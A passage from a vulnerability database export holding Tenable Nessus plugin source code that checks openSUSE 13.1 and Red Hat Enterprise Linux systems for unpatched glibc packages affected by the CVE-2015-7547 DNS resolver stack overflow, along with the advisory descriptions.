"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:glibc-i18ndata", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-locale-32bit", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo", "p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc-profile-32bit", "p-cpe:/a:novell:opensuse:glibc-utils", "p-cpe:/a:novell:opensuse:glibc-utils-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo", "p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit", "p-cpe:/a:novell:opensuse:glibc-utils-debugsource", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:nscd-debuginfo", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2016-234.NASL", "href": "https://www.tenable.com/plugins/nessus/88878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-234.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88878);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-2016-234)\");\n script_summary(english:\"Check for the openSUSE-2016-234 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issues :\n\n - fix stack overflow in the glibc libresolv DNS resolver\n function getaddrinfo(), known as CVE-2015-7547. It is a\n client side networked/remote vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debugsource-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-static-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-html-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-i18ndata-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-info-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-profile-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-2.18-4.41.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debuginfo-2.18-4.41.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debugsource-2.18-4.41.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-debuginfo-2.18-4.41.2\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-debugsource-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-devel-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-devel-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-devel-static-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-extra-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-extra-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-locale-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-locale-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-obsolete-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-obsolete-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"glibc-profile-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"nscd-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"i686\", reference:\"nscd-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-debugsource-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-static-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-extra-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-extra-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-obsolete-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-obsolete-debuginfo-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-profile-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.18-4.41.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.18-4.41.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"nscd-2.18-4.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"nscd-debuginfo-2.18-4.41.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:19:52", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6.2, 6.4, and 6.5 Advanced Update Support, and Red Hat Enterprise Linux 6.6 and 7.1 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : glibc (RHSA-2016:0225)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7.1"], "id": "REDHAT-RHSA-2016-0225.NASL", "href": "https://www.tenable.com/plugins/nessus/88793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0225. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88793);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0225\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2016:0225)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.2, 6.4, and 6.5 Advanced Update\nSupport, and Red Hat Enterprise Linux 6.6 and 7.1 Extended Update\nSupport.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2161461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6\\.2|6\\.4|6\\.5|6\\.6|7\\.1)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.2 / 6.4 / 6.5 / 6.6 / 7.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0225\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"glibc-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.9\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.17\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"glibc-devel-2.12-1.149.el6_6.11\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", 